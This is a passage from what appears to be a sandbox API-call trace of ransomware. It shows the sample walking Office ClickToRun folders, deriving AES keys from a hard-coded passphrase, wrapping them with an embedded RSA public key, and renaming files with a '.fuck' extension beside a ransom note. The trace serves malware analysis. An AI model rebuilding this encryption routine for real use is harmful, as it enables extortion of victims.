hFindFile=0x2893af0 | out: hFindFile=0x2893af0) returned 1 [0239.122] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\readme_back_files.htm")) returned 0xffffffff [0239.122] AreFileApisANSI () returned 1 [0239.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f69a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0239.122] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.123] GetLastError () returned 0x5 [0239.123] GetLastError () returned 0x5 [0239.123] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.123] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2893cf0 [0239.124] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.124] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.124] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.124] GetLastError () returned 0x5 [0239.124] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man")) returned 0x20 [0239.126] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man", dwFileAttributes=0x80) returned 0 [0239.126] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.127] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.127] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg", dwFileAttributes=0x2) returned 0 [0239.128] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab040) returned 1 [0239.130] CryptCreateHash (in: hProv=0x28ab040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.130] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.130] CryptHashData (hHash=0x2893f70, pbData=0x2884c10, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.130] CryptDeriveKey (in: hProv=0x28ab040, Algid=0x6610, hBaseData=0x2893f70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28940f0) returned 1 [0239.130] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.130] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.130] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aa380) returned 1 [0239.131] CryptImportPublicKeyInfo (in: hCryptProv=0x28aa380, dwCertEncodingType=0x1, pInfo=0x28960c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28960f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28960f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2893e30) returned 1 [0239.131] CryptEncrypt (in: hKey=0x2893e30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.131] CryptEncrypt (in: hKey=0x2893e30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aae20*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aae20*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.131] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aae20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.131] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.131] CryptEncrypt (in: hKey=0x28940f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.131] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.131] CloseHandle (hObject=0xffffffff) returned 1 [0239.131] CloseHandle (hObject=0xffffffff) returned 1 [0239.132] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), bFailIfExists=0) returned 0 [0239.132] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man", dwFileAttributes=0x0) returned 0 [0239.132] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.gsg")) returned 0 [0239.133] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.fuck")) returned 0 [0239.133] CryptDestroyHash (hHash=0x2893f70) returned 1 [0239.133] CryptDestroyKey (hKey=0x28940f0) returned 1 [0239.133] CryptReleaseContext (hProv=0x28ab040, dwFlags=0x0) returned 1 [0239.133] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.133] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.133] GetLastError () returned 0x5 [0239.133] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml")) returned 0x20 [0239.134] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.134] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.134] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.135] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.135] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aaf30) returned 1 [0239.138] CryptCreateHash (in: hProv=0x28aaf30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.138] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.138] CryptHashData (hHash=0x2893af0, pbData=0x2884bc0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.138] CryptDeriveKey (in: hProv=0x28aaf30, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28940f0) returned 1 [0239.138] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.138] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.138] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aafb8) returned 1 [0239.139] CryptImportPublicKeyInfo (in: hCryptProv=0x28aafb8, dwCertEncodingType=0x1, pInfo=0x2896190*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28961c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28961c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2893e70) returned 1 [0239.139] CryptEncrypt (in: hKey=0x2893e70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.139] CryptEncrypt (in: hKey=0x2893e70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aab78*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aab78*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.139] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aab78, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.139] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.139] CryptEncrypt (in: hKey=0x28940f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.139] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.139] CloseHandle (hObject=0xffffffff) returned 1 [0239.139] CloseHandle (hObject=0xffffffff) returned 1 [0239.140] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.140] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.140] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.141] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.141] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.142] CryptDestroyKey (hKey=0x28940f0) returned 1 [0239.142] CryptReleaseContext (hProv=0x28aaf30, dwFlags=0x0) returned 1 [0239.142] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.142] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.142] GetLastError () returned 0x5 [0239.142] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml")) returned 0x20 [0239.142] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.142] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.143] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.143] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.144] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa5a0) returned 1 [0239.146] CryptCreateHash (in: hProv=0x28aa5a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.146] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.146] CryptHashData (hHash=0x2893fb0, pbData=0x2884c38, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.146] CryptDeriveKey (in: hProv=0x28aa5a0, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.146] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.146] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.146] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aaaf0) returned 1 [0239.146] CryptImportPublicKeyInfo (in: hCryptProv=0x28aaaf0, dwCertEncodingType=0x1, pInfo=0x28969b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28969e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28969e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28940f0) returned 1 [0239.147] CryptEncrypt (in: hKey=0x28940f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.147] CryptEncrypt (in: hKey=0x28940f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa848*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa848*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.147] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa848, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.147] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.147] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.147] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.147] CloseHandle (hObject=0xffffffff) returned 1 [0239.147] CloseHandle (hObject=0xffffffff) returned 1 [0239.147] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.147] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.148] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.gsg")) returned 0 [0239.148] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.fuck")) returned 0 [0239.149] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.149] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.149] CryptReleaseContext (hProv=0x28aa5a0, dwFlags=0x0) returned 1 [0239.149] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.149] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.149] GetLastError () returned 0x5 [0239.149] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml")) returned 0x20 [0239.149] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.149] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), 